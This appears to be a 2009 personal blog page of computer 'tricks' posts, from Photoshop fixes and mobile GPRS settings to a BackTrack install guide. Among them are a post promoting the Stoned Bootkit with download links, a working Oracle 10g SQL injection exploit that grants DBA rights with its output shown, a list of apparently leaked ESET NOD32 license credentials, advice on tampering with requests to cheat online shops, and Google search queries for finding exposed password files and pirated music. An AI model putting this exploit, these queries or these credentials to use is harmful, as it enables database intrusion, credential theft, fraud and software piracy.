Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Thursday, August 13, 2009

Stoned Bootkit: Attack your Windows

Old news, but still VERY important. At the recently concluded BlackHat 2009 USA, the Stoned Bootkit was released by Peter Kleissner.

The Stoned Bootkit has full access to the system and is able to bypass any security check done by Windows. Why is this dangerous and useful at the sametime? Because- first, it has an open source architecture. Second, it loads into the computer memory before Windows does! Third, it can work on any platform - Windows XP and onwards. Fourth, it can attack the TrueCrypt full volume encryption. Now, ain’t that nasty? It sure is. Wait till you read some more about it. This is it’s feature list:
- attacks Windows XP, Sever 2003, Windows Vista, Windows 7 with one single master boot record
– attacks TrueCrypt full volume encryption
– has integrated FAT and NTFS drivers
– has an integrated structure for plugins and boot applications (for future development)
- is a Master Boot Record, with the target to be memory resident up to the Windows Kernel
- supports the IA32, AT Architecture (IBM-conforming)
- has rich API support
- supports the following boot methods: Floppy, Hard Disk, CD/DVD/Blu Ray, Network (PXE), USB flash drives, and others!

As it is said in the features list, it supports the plugin architecture. Since its architecture is open source, you can build as many plugins you want depending on your requirements. Here is a list of plugins that is pre-shipped with the Stoned BootKit:

  • User Interface

  • CO2-Plugin

  • PE Infector

  • File Parsers

  • HibernationFile Attack

  • PagefileInjector

  • Music Melody!

  • BootPassword Crack

  • AntiWPA

  • Persistent BIOSInfector


In addition to these plugins, it has the following softwares:

  • Forensic Lockdown Software (provides an interface for some operations like a boot menu, original MBR restoration and of course (experimental) locking/unlocking methods.)

  • Hibernation File Attack (uses the bootkit functions to open and modify the hibernation file and to compress and decompress the buffers using the xpress algorithm.)

  • Sinowal Loader (loads and executes the Sinowal kernel driver from the file system.)


If you want, you can also check how it works using QEmu, Bochs or VMWare! The Stoned Bootkit project name was actually inspired by the Stoned virus, the first MBR virus which can infect the Windows XP MBR too. The project itself is built upon the Hibernation File Attack, which was built by the author in the past. The only catch in its installation is that it will need an Administrators access to infect a Windows XP system and an Elevated Administrator access to infect a Windows Vista.

The author plans to add more functionality to the further versions by adding features like polymorphism and metamorphism. The target of Stoned is to be the most sophisticated and most widespread used bootkit in 2010!

You can download the Stoned Bootkit here and read more about it on its homepage here.

Wednesday, August 5, 2009

Photoshop White Color Problem

I recently Downloaded Adobe Photoshop CS3

while installing an error related to my Samsung LCD

samsung-error

me little confused coz i installed photoshop many times but never seen this monitor related problem as a user i click on Use Anyway...........

but while editing some pictures a strange problem didn't  get White color.

i checked all color setting even try R:255 G:255 B:255 still color was creamy / Yellow.

photo colour

but i mess with photoshop & get d white color yuppie...!!!
This Problem Due To Samsumg Drivers...if you have same problem Remove Samsung Driver

& then Do Reset Preferences in photoshop.

A lot of Photoshop problems can be fixed by dumping the preferences file: While launching Photoshop, Hold down Alt+Ctrl+shift on the PC or Cmd+Option+Shift on the mac. When asked to reset the preferences say yes.

After that if first message related to samsung monitor , wisely choose "Ignore Profile".
**Before you do this, save your custom Patterns, actions, styles, brushes, gradients, shapes and color pallettes. These will also be reset. Tip: You can create an action to do this, so you have a one click backup!

Saturday, August 1, 2009

GPRS settings

Manual Airtel Gprs Settings (FREE GPRS)
1. Homepage - any page you want to set.
2. User Name - Blank
3. Password - Blank
4. Proxy - Enabled/yes.
5. Proxy and Server Adress - 202.56.231.117
6. Proxy and Server Port - 8080
7. Data bearer - GPRS or Packet Data.
8. Access Point Name - airtelgprs.com
9. Authentication Type - Normal
10. Use preferred access point - No

Airtel live settings


1. Account Name - Airtel_live
2. Homepage - http://live.airtelworld.com
3. Username - Blank
4. Password - Blank
5. Proxy - Enabled/yes
6. Proxy and Server Adress - 100.1.200.99
7. Accespoint Name - airtelfun.com
8. Proxy and Server Port - 8080
9. Data bearer - GPRS/ Packet Data
10. Authentication Type - Normal

Idea_GPRS {FREE GPRS}

1. Account Name - idea_GPRS
2. Username - Blank
3. Password - Blank
4. Homepage - http://wap.ideafresh.com
5. Proxy and Server Port - 8080
6. Proxy and Server adress - 10.4.42.45
7. Databearer - GPRS / Packetdata
8. Acces Point Name - imis
9. Proxy - Enabled/yes
10. Authentication Type - Normal

Bsnl Gprs Settings

1. Account Name - BPL WAP
2. Username -
3. Password -
4. Proxy - Enabled/yes
5. Homepage - http://wap.mizone.bplmobile.com
6. Proxy and Server address - 10.0.0.10
7. Proxy and Server Port - 8080
8. Acces Point Name - mizone
9. Data bearer - GPRS/ Packetdata
10. Authentication Type - Normal

Sunday, July 19, 2009

Installing pre-backtrack 4 iso in VMware

In this tutorial we are going to install backtrack 4 Pre Final due to they have not released one & it is faster to use in VMware.

Need to Download


1) Vmware player

2) Backtrack4 pre final iso

3) Qemu ( for installing from windows)

----------------------------------------------------Step One---------------------------------------------------

Start a command prompt and cd to the installation directory of QEMU, for example:

cd C:\Program Files\Qemu

and create a VMware disk file as follows:

C:\Program Files\Qemu>qemu-img.exe create -f vmdk Backtrack 4 Pre Final.vmdk 2G
Formating 'Backtrack 4 Pre Final', fmt=vmdk, size=2097152 kB

If you copy paste the above line into the command prompt (cmd.exe), do not include the prompt (the text before qemu-img.exe). If you do, you get the following error: 'C:\Program' is not recognized as an internal or external command, operable program or batch file.

A file "Backtrack 4 Pre Final.vmdk" with a maximum disk size of 2G (the actual file is much smaller; about 320 KB) has been created. You might want to move this file to a different folder.

Now, create an empty text file, and rename it to "Backtrack 4 Pre Final.vmx" (use the same name as in the previous step, but use vmx as the extension instead). Open the file in an editor and enter the following values:

.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "7"
scsi0.present = "TRUE"
memsize = "512"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "Backtrack 4 Pre Final.vmdk"
ide1:0.present = "TRUE"
ide1:0.fileName = "/dev/scd0"
ide1:0.deviceType = "cdrom-raw"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
ethernet0.wakeOnPcktRcv = "FALSE"
usb.present = "TRUE"
ehci.present = "TRUE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
mks.enable3d = "TRUE"
pciBridge0.present = "TRUE"
pciBridge4.present = "TRUE"
pciBridge4.virtualDev = "pcieRootPort"
pciBridge4.functions = "8"
pciBridge5.present = "TRUE"
pciBridge5.virtualDev = "pcieRootPort"
pciBridge5.functions = "8"
pciBridge6.present = "TRUE"
pciBridge6.virtualDev = "pcieRootPort"
pciBridge6.functions = "8"
pciBridge7.present = "TRUE"
pciBridge7.virtualDev = "pcieRootPort"
pciBridge7.functions = "8"
vmci0.present = "TRUE"
buslogic.noDriver = "FALSE"
roamingVM.exitBehavior = "go"
displayName = "Backtrack 4 Pre Final"
guestOS = "winxppro"
nvram = "Backtrack 4 Pre Final.nvram"
virtualHW.productCompatibility = "hosted"
ft.secondary0.enabled = "TRUE"
easyInstall.keepFloppy = "TRUE"
tools.upgrade.policy = "useGlobal"

extendedConfigFile = "Backtrack 4 Pre Final.vmxf"

ethernet0.addressType = "generated"
uuid.location = "56 4d 4c a0 66 07 65 10-ce f8 54 ad 27 78 cd d0"
uuid.bios = "56 4d 4c a0 66 07 65 10-ce f8 54 ad 27 78 cd d0"
scsi0:0.redo = ""
vmotion.checkpointFBSize = "134217728"
pciBridge0.pciSlotNumber = "17"
pciBridge4.pciSlotNumber = "21"
pciBridge5.pciSlotNumber = "22"
pciBridge6.pciSlotNumber = "23"
pciBridge7.pciSlotNumber = "24"
scsi0.pciSlotNumber = "16"
usb.pciSlotNumber = "32"
ethernet0.pciSlotNumber = "33"
sound.pciSlotNumber = "34"
ehci.pciSlotNumber = "35"
vmci0.pciSlotNumber = "36"
ethernet0.generatedAddress = "00:0c:29:78:cd:d0"
ethernet0.generatedAddressOffset = "0"
vmci0.id = "662228432"

--------------------------------------------------------Step Two-----------------------------------------------------

Now you have Backtrack running in vmware you need to install you can do this by dragging & dropping the install.sh file
into you terminal then you will get a error about fonts just click continue then go on with the installation.

When you have completed the installation it will ask you to reboot.

Once the machine has rebooted enter the username & password that you created & do not type startx we have to make some fixes
so you can login as root....

So you have entered your username & password we have to next type "sudo su" it will then ask you for your password
enter the password that you login with then it will ask you for a new password set that as "toor"

now all we have left to do is repair the boot splash screen we can do this by typing in "sudo fix-splash" it will ask you if you would like to over wright
enter "y" to confirm you would like to over wright it

then type in reboot to restart the computer

now you can login with root & toor as username & password

-------------------------------------------Best of Luck---------------------------------------------------------------

Thursday, July 16, 2009

ESET nod32 Keys

ESET nod32 Keys(01-OCT-2009)





UserName: EAV-22247029
Password: 65r56s3cmb

UserName: EAV-22139431
Password: 36faeft5f3

Username: TRIAL-22457353
Password: mva6xe3bbr

Username: TRIAL-22460528
Password: 5crhdk6chj

Username: TRIAL-22318136
Password: v74sp38jx8

UserName: EAV-17440697
Password: 553df2ac7v

UserName: EAV-17442243
Password: fmk8hsjk4v

Username: EAV-22254510
Password: r87v5f2xpr

Username:EAV-21911559
Password:uhkhk2jr27

Username:EAV-17439511
Password:55jpxa6sfj

Username:EAV-20282038
Password:c64a22krun

Username:EAV-20449260
Password:xhhk3j4b4e

Username:EAV-20433592
Password:tm7kdv6vbd

Username:EAV-21587910
Password:8677vhkdk7

Username: TRIAL-22188115
Password: f5enfr4s3d

Username: TRIAL-22318139
Password: t7j3hejnex

Username: TRIAL-22318138
Password: f3bujnjfph

Thursday, July 9, 2009

Oracle 10g SQL injection Exploit

ORACLE 10g Exploit Example




This is based on cursor injection and does not need create function
privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate
 ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#----------screen dump--------------------------------------------#
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
--------------------------- ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction;
begin execute imme
diate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
--------------------------- ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

Friday, June 12, 2009

Test your Anti-Virus

copy below text into your text file and save as .com or .exe
----------------------------------------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
----------------------------------------------------------------------

Dont Worry.....it will not effect your computer....!!!

this code is called EICAR test file

The EICAR test file (official name: EICAR Standard Anti-Virus Test File)
is a file, developed by the European Institute for Computer Antivirus
Research,to test the response of computer antivirus (AV) programs.
The file is simply a text file of either 68 or 70 bytes that is a
legitimate executable file called a COM file that can run by Microsoft
operating systems and some work-alikes (except for 64-bit due to 16-bit
limitations), including OS/2. When executed, it will print "EICAR-
STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was
specifically engineered to consist of ASCII human-readable characters,
easily created using a standard computer keyboard.It makes use of
self-modifying code to work around technical issues that this
constraint makes on the execution of the test string.

Friday, April 10, 2009

Mozilla Firefox -- Tricks & addd-ons

I prefer you always use Mozilla Firefox.

Lots of advantage over Internet Explorer.

The biggest advantage in using Firefox over I.E. is the fact that spyware does not get on your machine nearly as much.

In my experience with these browsers, I.E. will attract at least 60% more spyware than Firefox. Spyware might not seem like a big deal but over time your machine will collect it like wax collects in your ears. It will slow your PC down and problems will begin from that point.

Mozilla Firefox offers the fantastic advantage of the Site Navigation toolbar. This toolbar can be used to separately display the content from the link tags provided in any document

:::DOWNLOAD MOZILLA FIREFOX :::
http://www.mozilla.com/en-US/firefox/firefox.html

  1. SET MULTIPLE HOME PAGES IN FIREFOX



In Mozilla Firefox you can set multiple home pages

Suppose you would like to set yahoo, Google and jaiminbhagat.wordpress.com as your homepages. Then try this tweak in Firefox to set multiple homepages. It can be done as:



  • Goto Tools>Options>Main

  • In When Firefox starts drop down menu choose Show my home page

  • In Home page give your homepages separated by a | (pipe symbol)

  • Click OK


mozilla

---------------------------------------------------------------------------------------------------------------------------------------------




2. USEFUL add-ons to cheat with the online shopping and some other paying websites.

::: DOWNLOAD LINK :::

https://addons.mozilla.org/en-US/firefox/addon/966

also this add-ons useful to know what actual process is going on after click some button & which type of method used by web service.



"Tampering" is the act of modifying request parameters before request submission. To begin Tampering, in the Ongoing Requests window, click the "Start Tamper" button in the upper-left corner.

From here on out, whenever a top-level request is issued, you'll be prompted to tamper with the request. Selecting the Tamper button will launch the Tamper Popup.

Traditional HTTP header fields are to the left, while any POST data is to the right. If the request uses the GET method, then the right-hand side of the dialog will be empty.

After changing any request parameters, clicking OK will execute the request. In the Tamper Popup window, right-clicking a field reveals shortcut methods for a number of neat tricks such as URL encoding/decoding, Base64 encoding/decoding and HTML character removal.

Video Example of Tamper Data







---------------------------------------------------------------------------------------------------

Get visual video summaries on YOUTUBE


Videosurf recently released a nifty Firefox Extension, which lets you scan through the video on Youtube and in your search results even before you play they video..cool right?

Get visual video summaries on Google, Yahoo! & Youtube search pages as well as the Youtube video page. See what a video is about before watching it and jump around in time.

VideoSurf video summaries display selected thumbnails from the most important scenes in a video. Now you can easily find the video you want, avoid spam and jump to specific moments in a video.

Click Here to Download







Visual Summaries Available On:

- Google Search
- Youtube Search
- Youtube Home Page
- Youtube Video Page
- Yahoo! Search
- FriendFeed


Additional Features and Options:

- Use the visual summary to jump in time while watching a video on YouTube's video page
- Discover more videos featuring the characters in the videos you click on, and learn more about them



tricky google

yes, from google you can search effectively with some syntax or query....


suppose i wanna search a song  "sexy back" in simple search its too difficult to find or if you find it then it ask for money


so try this to download your favorite songs without paying & in fraction of time


here


-inurl:htm -inurl:html intitle:"index of" mp3 "sexy back"


trickygoogle

:::here also some other queries for your help:::




  • filetype:ini ws_ftp




  • pwdallinurl:auth_user_file.txt | DCForum user passwords




  • filetype:reg reg HKEY_ | Windows Registry exports can reveal




  • "index of/" "ws_ftp.ini" | WS_FTP FTP credentials




  • filetype:properties inurl:db | Various database credentials, server names




  • intitle:index.of master.passwd | UNIX master.passwd user credentials